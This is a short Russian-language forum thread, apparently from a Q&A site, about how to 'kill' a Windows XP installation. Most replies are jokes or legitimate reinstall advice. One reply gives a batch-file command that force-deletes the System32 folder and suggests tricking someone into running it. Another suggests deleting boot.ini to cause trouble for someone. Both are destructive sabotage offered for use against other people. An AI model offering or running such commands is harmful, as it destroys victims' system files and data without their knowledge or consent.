Как аккуратно убить Windows XP

Гость
Ответ(ы) на вопрос:
Гость
Молотком не пробовал?
Гость
если ты хош каму то напакоститть то создай текстовый файл и там напиши ECHO Y|DEL C:WindowsSystem32 птом сохрани етот файл с форматом .bat птом если чел запустит ему бб винде =)
Гость
А если понадобиться восстановить, то лучше закомментить строчки в boot.ini
Гость
ну убить конечно, звучит круто. можно просто через поиск найти файл boot.ini и удалить его. убить не убьешь, но геморрой будет.. . это, если цель кому-то навредить....
Гость
новый устанавливаешь и стираешь раздел со старым виндовсом
Гость
путем форматирония диска .Выставляешь в биосе загрузку с сд-ром и грузишься с установочного диска а далее по инструкции
Гость
boot.ini